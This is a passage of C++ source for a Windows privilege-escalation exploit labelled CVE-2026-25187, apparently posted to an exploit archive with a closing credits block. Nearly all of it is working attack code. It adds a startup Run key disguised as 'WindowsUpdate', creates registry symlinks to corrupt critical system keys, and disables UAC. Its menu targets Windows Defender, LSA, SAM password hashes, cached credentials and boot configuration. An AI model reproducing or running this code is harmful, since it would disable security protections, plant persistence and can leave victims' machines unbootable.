if (RegOpenKeyExW(HKEY_CURRENT_USER,
L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
wchar_t path[MAX_PATH];
GetModuleFileNameW(nullptr, path, MAX_PATH);
RegSetValueExW(hKey, L"WindowsUpdate", 0, REG_SZ,
(BYTE*)path, (wcslen(path) + 1) * sizeof(wchar_t));
RegCloseKey(hKey);
printf("[+] Persistence added to HKCU\\Run\n");
}
}
bool CreateMassiveRegistryCorruption() {
printf("\n[*] Creating massive registry corruption...\n");
std::vector<std::wstring> extraTargets = {
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Executive",
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management",
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL",
L"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System",
L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
};
for (const auto& target : extraTargets) {
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
if (RegistryUtils::CreateRegistrySymlink(m_sessionPath, target, true)) {
printf("[+] Corruption symlink created for: %ls\n", target.c_str());
Sleep(50);
}
}
return true;
}
};
class PrivilegeEscalation {
public:
static bool DisableUAC() {
printf("[*] Disabling UAC...\n");
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
DWORD disable = 0;
RegSetValueExW(hKey, L"EnableLUA", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
RegSetValueExW(hKey, L"ConsentPromptBehaviorAdmin", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
RegCloseKey(hKey);
printf("[+] UAC disabled (requires reboot)\n");
return true;
}
return false;
}
static bool GrantDebugPrivileges() {
printf("[*] Granting debug privileges...\n");
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SECURITY\\Policy\\Privileges",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
RegCloseKey(hKey);
return true;
}
return false;
}
};
int wmain(int argc, wchar_t* argv[]) {
printf("\n");
printf("========================================\n");
printf(" CVE-2026-25187 - Critical EoP Exploit\n");
printf(" WinLogon Registry Deletion to SYSTEM\n");
printf("========================================\n\n");
bool massDeletion = false;
bool persistent = false;
int targetIndex = -1;
for (int i = 1; i < argc; i++) {
if (_wcsicmp(argv[i], L"--mass") == 0) {
massDeletion = true;
}
else if (_wcsicmp(argv[i], L"--persist") == 0) {
persistent = true;
}
else if (_wcsicmp(argv[i], L"--target") == 0 && i + 1 < argc) {
targetIndex = _wtoi(argv[++i]);
}
else if (_wcsicmp(argv[i], L"--help") == 0) {
printf("Usage: %s [options]\n", argv[0]);
printf("Options:\n");
printf(" --mass Mass delete multiple critical keys\n");
printf(" --persist Add persistence to startup\n");
printf(" --target N Attack specific target by index\n");
printf(" --disable-uac Disable UAC after deletion\n");
printf("\nWARNING: This exploit will cause system instability!\n");
return 0;
}
}
printf("[!] WARNING: This exploit will delete critical registry keys!\n");
printf("[!] System may become UNBOOTABLE or severely damaged.\n");
printf("[!] Continue? (y/N): ");
wint_t ch = towlower(getwchar());
if (ch != L'y') {
printf("[*] Exploit aborted.\n");
return 0;
}
WinLogonEoPExploit exploit(persistent);
bool success = false;
if (massDeletion) {
printf("\n[*] Running mass deletion mode...\n");
success = exploit.ExploitMultipleTargets();
exploit.CreateMassiveRegistryCorruption();
} else {
printf("\n[*] Available targets:\n");
printf(" 0 - UAC Bypass (Disable UAC)\n");
printf(" 1 - Windows Defender\n");
printf(" 2 - Security Policies\n");
printf(" 3 - LSA Configuration\n");
printf(" 4 - SAM (Password Hashes)\n");
printf(" 5 - Cached Credentials\n");
printf(" 6 - Code Integrity\n");
printf(" 7 - Boot Configuration (DoS)\n");
printf(" 8 - ALL (Mass Deletion)\n");
int choice = targetIndex;
if (choice == -1) {
printf("\n[*] Select target (0-8): ");
wscanf_s(L"%d", &choice);
}
if (choice == 8) {
success = exploit.ExploitMultipleTargets();
} else if (choice >= 0 && choice < 8) {
auto& target = exploit.m_targets[choice];
success = exploit.ExploitSingleTarget(target.first, target.second);
if (choice == 0) {
PrivilegeEscalation::DisableUAC();
}
}
}
if (success) {
printf("\n[+] Exploit triggered! System will logout now.\n");
printf("[*] After login, check if target registry keys are deleted.\n");
Sleep(2000);
} else {
printf("\n[!] Exploit failed. Try running again or use different target.\n");
}
return 0;
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================